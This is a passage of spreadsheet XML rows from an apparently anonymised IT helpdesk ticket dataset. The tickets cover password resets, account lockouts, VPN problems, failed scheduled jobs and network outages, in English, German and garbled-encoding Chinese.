    <s v="_x000a__x000a_received from: sdbcpvtx.hzpctsla@gmail.com_x000a__x000a__x000a__x000a_above is the link to the gtehdnyu belt tracker.  the person who generated this site (nicrhty pfgyhtu) and wrote the original programdnty had it set up so that the full time oe personnel did not ever receive recertification notices and warnings.  all of a sudden this week we are all receiving those emails.  i am attaching one of the emails._x000a__x000a_the list of oe personnel who should not receive these emails for any gtehdnyu belts:_x000a__x000a_clswzxoq higqaepr_x000a_pattghyuy karcgdwswski_x000a_dkinobsv wymgzcrh_x000a_ykolismx kbysnuim_x000a_yhroaeqj djtyroha_x000a_phksfqxe wkbovsmu_x000a_dshferby houtnzdi_x000a_mikhghytr gerusky_x000a_jafgty verghjuen_x000a__x000a_i am double checking to see if my list is complete._x000a__x000a__x000a_these people are full time oe and permanently certified._x000a__x000a_please let me know what else you need._x000a__x000a_"/>
    <s v="sdbcpvtx hzpctsla"/>
    <x v="15"/>
  </r>
  <r>
    <s v="user needs help login to the company vpn."/>
    <s v="user needs help login to the company vpn."/>
    <s v="nyjvwsxf npwoglzf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software password has expired"/>
    <s v="my telephony_software password is getting expired today. please reset the password and let me know so that i can login._x000a__x000a_user id - mukghyuhea_x000a_contact no - "/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="6"/>
  </r>
  <r>
    <s v="collaboration_platform application uninstalled "/>
    <s v="collaboration_platform application uninstalled "/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="&quot;scghhnelligkeit&quot; meines internets plnvcwuq ikupsjhb ( umstellung auf ip / anpassung router speedport w504v !? ) "/>
    <s v="_x000a__x000a_received from: jclrangd.kjlnearz@gmail.com_x000a__x000a_hallo frau muejkipler,_x000a__x000a_ich hoffe sie sind fÃ¼r diesen fall die richtige ansprechpartnerin bzw. wissen wer hier herrn plnvcwuq ikupsjhb noch weiter helfen kann._x000a_herr voigt ist nicht mehr greifbar und herr gerberghty im urlaub. ich wÃ¼rde vermuten, dass hier eine direkte klÃ¤rung und mithilfe bzgl. beurteilung u.a. der telekom notwendig ist._x000a__x000a_allerdings ist mir nicht bekannt wie aktuell der stand im unternehmen company ist bzgl. ip umstellung._x000a_oder mÃ¼ssen wir warten bis herr gerberghty aus dem urlaub ist !?_x000a__x000a_mit freundlichen grÃ¼ÃŸen / with kind "/>
    <s v="jclrangd kjlnearz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1132: oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)"/>
    <s v="oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="can u pl. check if server HostName_637 is working fine"/>
    <s v="from: nanrfakurtyar  c _x000a_sent: monday, 05 september, 2016 8:49 pm_x000a_to: -dba_x000a_subject: can u pl. check if server HostName_637 is working fine_x000a__x000a_can u pl. check if server HostName_637 is working fine._x000a__x000a_also check edmsm011_x000a__x000a_"/>
    <s v="bqjvxsaf aupdonjy"/>
    <x v="1"/>
  </r>
  <r>
    <s v="password reset : login issues"/>
    <s v="password reset : login issues"/>
    <s v="nxvbtfui hjickwyd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="restore o:\schaem\eigene dateien\db1.mdb"/>
    <s v="hallo _x000a__x000a_wÃ¼rdest du bitte diese datei &quot;o:\schaem\eigene dateien\db1.mdb&quot; zurÃ¼cksetzen_x000a__x000a_ _x000a_es scheint alles nicht mehr zu funktionieren_x000a_danke_x000a__x000a_cflrqoew qbgjwaye_x000a_process planning_x000a_cflrqoew.qbgjwaye@gmail.com_x000a__x000a_"/>
    <s v="cflrqoew qbgjwaye"/>
    <x v="11"/>
  </r>
  <r>
    <s v="restore directory schulzgth from public"/>
    <s v="hallo marfhtyio,_x000d__x000a__x000d__x000a__x000d__x000a_der ordner schulzgth aus dem laufwerk public (\\HostName_717)ist mir abhandengekommen, kannst mir den wieder zurÃ¼ck holen? und ihn dann auf laufwerk, departments (\\HostName_717), distribution, formulare reinstellen, vielen dank im voraus._x000d__x000a__x000d__x000a__x000d__x000a_kind "/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="11"/>
  </r>
  <r>
    <s v="EU_tool not run since 03.00 p.m we didn't have any information about sistem shut down"/>
    <s v="EU_tool not run since 03.00 p.m we didn't have any information about sistem shut down"/>
    <s v="vmtwoadp ohjvlcmb"/>
    <x v="25"/>
  </r>
  <r>
    <s v="i'm on vacation, and my vpn isn't working.  can you reset it for me?"/>
    <s v=", vpn"/>
    <s v="koiapqbg teyldpkw"/>
    <x v="49"/>
  </r>
  <r>
    <s v="webpage won't load"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_i have been having trouble getting some webpages to load._x000a_1st one is on the insurance site to change password. when i try to log on to the site it says i need to update my password. when i click on the ok all i get is a blank page. see below. please advise._x000a__x000a_[cid:image001.png@01d20755.724b5580]_x000a__x000a_[cid:image002.jpg@01d20755.724b5580]_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" account lock release request of &quot;kanghytaim&quot;"/>
    <s v=" account lock release request of &quot;kanghytaim&quot;"/>
    <s v="gworzkhc inypbucg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="am keyence messgerÃ¤t monitor ausgetauscht"/>
    <s v="am keyence messgerÃ¤t monitor ausgetauscht"/>
    <s v="ugvkyalo ayofwjpi"/>
    <x v="41"/>
  </r>
  <r>
    <s v="probleme mit ie \dwgliuyt ieqgdpbm"/>
    <s v="probleme mit ie \dwgliuyt ieqgdpbm"/>
    <s v="qtovukbc jumqcvti"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit ewew8311667 \wrcktgbd wzrgyunp"/>
    <s v="probleme mit ewew8311667 \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="tÃ¼r- Ã¶ffnerfunktion geht nicht."/>
    <s v=" keine tÃ¼r- Ã¶ffnerfunktion bei folgenden zeiterfassungskarten mÃ¶glich._x000d__x000a_6045;4586;10039;2494;4646;6081;6082"/>
    <s v="tgpvrbyi ztdxwpcn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: frydqbgs.ugmnzfik@gmail.com_x000d__x000a__x000d__x000a_hello all,_x000d__x000a__x000d__x000a_net weaver business client doesn't work with the message below. it's daily required function, please fix soon._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d2077b.7c080d40]_x000d__x000a__x000d__x000a_"/>
    <s v="frydqbgs ugmnzfik"/>
    <x v="0"/>
  </r>
  <r>
    <s v="balance carry forward for ap and ar report "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ihfkwzjd.erbxoyqk@gmail.com_x000d__x000a__x000d__x000a_dear it team_x000d__x000a__x000d__x000a_i have run report as below i found that balance carry forward is not shown on the report both ap and ar report. please advise._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image002.jpg@01d2079b.c1165fc0]_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image004.jpg@01d2079b.c1165fc0]_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image006.jpg@01d2079b.c1165fc0]_x000d__x000a__x000d__x000a_[cid:image012.jpg@01d2079b.c1165fc0]_x000d__x000a__x000d__x000a_best "/>
    <s v="ihfkwzjd erbxoyqk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="re: finished: start of s&amp;op process -  my account is blocked - password issue"/>
    <s v="it support _x000d__x000a_could you please unlocked my account on supply_chain_software_x000d__x000a_best "/>
    <s v="qaohugxw kdeqjncw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="awb not printed out"/>
    <s v="can you please have a look to this, there seems to be no output in c:\shipping. to see this i had stopped ecs_print. it is dhl from apac to japan but other countries also affected_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_1953 was running longer than 30 minutes kirtyled and rerun"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953 failed in job_scheduler at: 09/05/2016 05:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="tastatur defekt \wcupoaty fqnzwphj"/>
    <s v="tastatur defekt \wcupoaty fqnzwphj"/>
    <s v="wcupoaty fqnzwphj"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp locked"/>
    <s v="_x000a__x000a_received from: xosycftu.olhpmsdw@gmail.com_x000a__x000a_hello_x000a__x000a_please unlock my password for erp._x000a_i need to change my password soon._x000a__x000a_user id: songhyody_x000a__x000a_"/>
    <s v="xosycftu olhpmsdw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3181 failed in job_scheduler at: 09/05/2016 05:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3181 failed in job_scheduler at: 09/05/2016 05:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="æŠ¥ç¨Žç”µè„‘ä¸èƒ½è”ç½‘ï¼Œè®©è´ºæ­£å¹³ä¼‘ã€‚"/>
    <s v="æŠ¥ç¨Žç”µè„‘ä¸èƒ½è”ç½‘ï¼Œè®©è´ºæ­£å¹³ä¼‘ã€‚"/>
    <s v="hlrmufzx qcdzierm"/>
    <x v="30"/>
  </r>
  <r>
    <s v="abap runtime error with transaction zload"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000d__x000a__x000d__x000a_enter user id of user having the issue: all user in plant_119 and plant_27_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with: zload_x000d__x000a__x000d__x000a_describe the issue: abap runtime error_x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="oebcqfli zvbxasky"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for qgilmtyc gmscovxa using password_management_tool password reset."/>
    <s v="the"/>
    <s v="qgilmtyc gmscovxa"/>
    <x v="16"/>
  </r>
  <r>
    <s v="archiving_tool scanner not working "/>
    <s v="archiving_tool scanner not working._x000d__x000a__x000d__x000a_please upgrade open text imaging scan to 10.2.0_x000d__x000a_opentext imaging enterprise scan 10..2.0_x000d__x000a_"/>
    <s v="giumxwvh lfvwjtin"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for rlhuwmve krcfhoxj using password_management_tool password reset."/>
    <s v="please reseat SID_1. i need to uacyltoe hxgaycze something."/>
    <s v="rlhuwmve krcfhoxj"/>
    <x v="16"/>
  </r>
  <r>
    <s v="computer can't started "/>
    <s v="computer can't started  "/>
    <s v="hctajofe qgrkcxyt"/>
    <x v="31"/>
  </r>
  <r>
    <s v="defekt lwl leitung \box defekt \vaigycet jtgmpdcr"/>
    <s v="defekt lwl leitung \box defekt \vaigycet jtgmpdcr"/>
    <s v="vaigycet jtgmpdcr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="ieæµè§ˆå™¨æ— æ³•æ‰“å¼€ã€‚"/>
    <s v="ieæµè§ˆå™¨æ— æ³•æ‰“å¼€ã€‚"/>
    <s v="dkxstwfq eljczgbn"/>
    <x v="31"/>
  </r>
  <r>
    <s v="ç³»ç»Ÿæ•…éšœï¼Œå¯åŠ¨è“å±."/>
    <s v="ç³»ç»Ÿæ•…éšœï¼Œå¯åŠ¨è“å±. "/>
    <s v="lhkqbmna ekhtivsd"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp SID_34 account locked."/>
    <s v="erp SID_34 account locked."/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="guestcompany access for wifi"/>
    <s v="_x000d__x000a__x000d__x000a_received from: htnvbwxs.gwfrzuex@gmail.com_x000d__x000a__x000d__x000a_good morning._x000d__x000a__x000d__x000a_i have our coivmhwj opwckbrv here, and would like for them to access to guestcompany wifi._x000d__x000a__x000d__x000a_there will be 5 of them._x000d__x000a__x000d__x000a_they will be here for 3 weeks._x000d__x000a__x000d__x000a_do i need to create separate accesses for them or can they share 1 login access?_x000d__x000a__x000d__x000a_please advise._x000d__x000a__x000d__x000a_"/>
    <s v="htnvbwxs gwfrzuex"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="zrcfyiea gynbmopr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="after changing to new group, several workflow items from old group are (still) visible in new groups workflow, too /-154"/>
    <s v="phone: _x000a_changed from milling team  csd 5111156895 to holemaking team csd 515611894, but still several workflow items from old group are visible in new groups workflow, too. erp substitution was ended by old team, as far as i was informed."/>
    <s v="nobwzdvh yqjugexl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job Job_1315 failed in job_scheduler at: 09/05/2016 02:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1315 failed in job_scheduler at: 09/05/2016 02:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="reset passwords for bxeagsmt zrwdgsco using password_management_tool password reset."/>
    <s v="the"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="16"/>
  </r>
  <r>
    <s v="[erp] query &quot;zload&quot; for production scheduling is generating abap error message"/>
    <s v="got forwarded an email regarding erp query zload generating error message. _x000d__x000a__x000d__x000a_see attachment for further details._x000d__x000a__x000d__x000a_i'm not sure how big of an impact this has so currently opening with sev3 - feel free to raise the priority in case this is a known important query._x000d__x000a__x000d__x000a_best "/>
    <s v="xvwchsdg pladjmxt"/>
    <x v="20"/>
  </r>
  <r>
    <s v="vip2 -enable to save to local pc in citrix with erp gui. assign to whomever supports citrix."/>
    <s v="vendor is creating reports for the usa carve-out and is unable to save reports to the local pc. she is using the erp gui.   a solution must be provided immediately if not sooner as this will delay the project._x000a_description form the vendor (vvgtybyrn):_x000a__x000a_once i am running reports, where can i save them? i need to save them as unconverted text, &amp; then i need to open each in excel &amp; make a few formatheywting changes before i save it &amp; send to the team leads. i ran a uacyltoe hxgaycze using se38 for the programdnty attached to the transaction, &amp; i cannot save to my own machine. i did try a thumb drive, but that was also unsuccessful. is there somewhere on the network where i can save them &amp; then someone can send them to me so i can format them on my own machine &amp; send them out? or if you have another idea on how we can accomplish it, that would be great._x000a_"/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="account locked out"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vhlepcta.lqbgcxpt@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a_abdhtyu account is locked out, could you please check?_x000d__x000a__x000d__x000a_"/>
    <s v="vhlepcta lqbgcxpt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage: usa tn, tm-usa-att-rtr circuit went  down at 03:04 am et on 09/05. global_telecom_1 ticket# 690500063"/>
    <s v="usa tn, tm-usa-att-rtr circuit went  down at 03:04 am et on 09/05. servers also went down but we see comcast circuit is up._x000d__x000a__x000d__x000a_usa tn, tm-usa-att-rtr - interface 'gigabitetâ€‹hernet0/1 Â· &quot; connection to nexus5k001 &quot;' has state: down since 11:52 pm et on 09/04."/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="access to network folder"/>
    <s v="_x000a__x000a_received from: sxnzacoj.lwvqgfby@gmail.com_x000a__x000a_please provide read and write access to mr. frseoupk feluybrn and karghytuthik  for following network folder_x000a__x000a_\\HostName_95\grinding_x000a_"/>
    <s v="sxnzacoj lwvqgfby"/>
    <x v="11"/>
  </r>
  <r>
    <s v="not able to log on to hub from remote location, urgent please call."/>
    <s v="_x000d__x000a__x000d__x000a_received from: slfxjznk.hmspexor@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="slfxjznk hmspexor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 09/04/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 09/04/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 09/04/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 09/04/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 09/04/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 09/04/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="vpn(apvpn ,vpn) unable to connection  . "/>
    <s v="vpn(apvpn ,vpn) unable to connection  .  "/>
    <s v="rekpvblc ufysatml"/>
    <x v="31"/>
  </r>
  <r>
    <s v="unable to generate po as per pr 3063.41.49.092"/>
    <s v="we've found the pop-up error when generating sto as per pr# 4121022907/00001 as attached, please help fixing this issue aerp., "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="29"/>
  </r>
  <r>
    <s v="please unlock my erp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xosycftu.olhpmsdw@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_please unlock my erp._x000d__x000a__x000d__x000a_user id: songhyody_x000d__x000a__x000d__x000a_"/>
    <s v="xosycftu olhpmsdw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mm# 5260903 ( kr230 )"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hmjdrvpb.komuaywn@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_could you please organise the mwst % tax for 1301 / 02, 03, 05 on the abovementioned rqfhiong zkwfqagb number?_x000d__x000a__x000d__x000a_kind "/>
    <s v="hmjdrvpb komuaywn"/>
    <x v="29"/>
  </r>
  <r>
    <s v="i forgot my erp password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uwlnpscr.lvkujfse@gmail.com_x000d__x000a__x000d__x000a_dears,_x000d__x000a__x000d__x000a_i forgot my erp password. could you help me to reset it? "/>
    <s v="uwlnpscr lvkujfse"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the terminate action for nyzxjwud jvtsgmin has completed."/>
    <s v="_x000a_-----original message-----_x000a_from: jobxpkrg klonypzr [mailto:system@hr_tool.com] _x000a_sent: monday, september 05, 2016 6:08 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: the terminate action for nyzxjwud jvtsgmin has completed._x000a__x000a_hello , _x000a__x000a_a termination for nyzxjwud jvtsgmin, 1133645201, effective 08/25/2016  has been approved._x000a__x000a_click the link to view._x000a__x000a_"/>
    <s v="jobxpkrg klonypzr"/>
    <x v="19"/>
  </r>
  <r>
    <s v="network outage at usa since 8:40pm et 09/04."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____8:40pm et 09/04.__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no__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x v="7"/>
  </r>
  <r>
    <s v="zcor0003 report issue"/>
    <s v="please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the &quot;operations&quot; folder)._x000d__x000a_site / location : apac apac_x000d__x000a_user id (ad) :lia1_x000d__x000a_system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):erp_x000d__x000a_transactions that are slow (e.g., va01, create an order): zcor0003_x000d__x000a_area this belongs to (e.g., sales, finance, markhtyeting etc.):fin_x000d__x000a_how can this issue be replicated by the it support group: zcor0003 report is used to get shipment data. there is variant tj331, now the data is incorrect for this report, would you please help to check what's the issue? we find the problem on sep 2._x000d__x000a_the shipment details for aug is download on sep 1 as attached. this report is running daily to tracking shipment. _x000d__x000a_if you need other information, you can contact me. _x000d__x000a_are other users seeing this? other users in tj _x000d__x000a_please attach relevant screenshots and exact times when the issue occurred:"/>
    <s v="uylomcrx nfvjsgze"/>
    <x v="9"/>
  </r>
  <r>
    <s v="help to change the windows password using password_management_tool password tool.  "/>
    <s v="help to change the windows password using password_management_tool password tool._x000a_-connected to the user system using teamviewer._x000a_-help the user login to the password_manager_tool password tool and change the passwords._x000a_-help the user to sync the psswords to the company network._x000a_-caller confirmed that he was able to login._x000a_-issue resolved._x000a_"/>
    <s v="uiaqhcpo nxzcieho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job snp_heu_5_regen failed in job_scheduler at: 09/04/2016 16:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_5_regen failed in job_scheduler at: 09/04/2016 16:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1306 failed in job_scheduler at: 09/04/2016 15:29:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1306 failed in job_scheduler at: 09/04/2016 15:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 09/04/2016 12:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 09/04/2016 12:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tbioceqj.ukjietwz@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i want change my password and make a mistake,_x000d__x000a_can you please reject to my old one_x000d__x000a__x000d__x000a_"/>
    <s v="tbioceqj ukjietwz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job snp_heu_1_regen failed in job_scheduler at: 09/04/2016 10:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_1_regen failed in job_scheduler at: 09/04/2016 10:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="firmware upgrade on the phones"/>
    <s v="davgtgyrh called in for an issue where there was supposed to be a firmware upgrade on the phones but davgtgyrh mentioned that the phones are still rebooting and its on a loop._x000a_"/>
    <s v="kxsceyzo naokumlb"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job Job_1395 failed in job_scheduler at: 09/04/2016 07:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1395 failed in job_scheduler at: 09/04/2016 07:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="emailing: 16-177747.htm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cowsvzel.ryhkefwv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a__x000d__x000a_now a days we are getting lot of other regions report in india dump, can you please solve this_x000d__x000a_every month we get close to 5-10 engineering_tool's  in to our system_x000d__x000a__x000d__x000a_"/>
    <s v="cowsvzel ryhkefwv"/>
    <x v="25"/>
  </r>
  <r>
    <s v="network outage :bellusco, it - divestiture site:site hard down since at 6:40 am et on 09/04.no backup"/>
    <s v="what type of outage:  __x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes___     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____6:40 am et on 09/04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na___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___na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laptop not booting up"/>
    <s v="when vigrtgyne is logging into his laptop, the laptop is automatically shutting down. he tried doing a power shutdown and also kept the pc off for an hour but still the same. the moment he's logging in, pc is shutting down by itself._x000a__x000a_user id - ravhdyui_x000a_pc name - aidl8911055_x000a_service tag - dbd1hz1_x000a_model - latitude e5430 non-vpro_x000a_"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job co_val_update_crosscomp failed in job_scheduler at: 09/04/2016 05:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job co_val_update_crosscomp failed in job_scheduler at: 09/04/2016 05:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="network outage: turkey turkey - site hard down since on 01:56 am et on 09/04/16 ."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____slo_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______ 01:56 am et.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no____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na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spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_48cold failed in job_scheduler at: 09/03/2016 21:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_48cold failed in job_scheduler at: 09/03/2016 21:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_50cold failed in job_scheduler at: 09/03/2016 21:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_50cold failed in job_scheduler at: 09/03/2016 21:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_27hot failed in job_scheduler at: 09/03/2016 20:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_27hot failed in job_scheduler at: 09/03/2016 20:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_41cold failed in job_scheduler at: 09/03/2016 20:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_41cold failed in job_scheduler at: 09/03/2016 20:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_44cold failed in job_scheduler at: 09/03/2016 20:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_44cold failed in job_scheduler at: 09/03/2016 20:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="bridgex from lacw8515941  step 'login' failed: resource not found"/>
    <s v="bridgex from lacw8515941  step 'login' failed: resource not found"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job SID_27hot failed in job_scheduler at: 09/03/2016 20:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_27hot failed in job_scheduler at: 09/03/2016 20:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_41cold failed in job_scheduler at: 09/03/2016 20:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_41cold failed in job_scheduler at: 09/03/2016 20:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_51cold failed in job_scheduler at: 09/03/2016 20:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_51cold failed in job_scheduler at: 09/03/2016 20:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_23cold failed in job_scheduler at: 09/03/2016 19:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_23cold failed in job_scheduler at: 09/03/2016 19:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_727 failed in job_scheduler at: 09/03/2016 19:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_727 failed in job_scheduler at: 09/03/2016 19:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_38cold failed in job_scheduler at: 09/03/2016 19:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_38cold failed in job_scheduler at: 09/03/2016 19:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_32cold failed in job_scheduler at: 09/03/2016 19:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_32cold failed in job_scheduler at: 09/03/2016 19:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_39cold failed in job_scheduler at: 09/03/2016 19:34:00  "/>
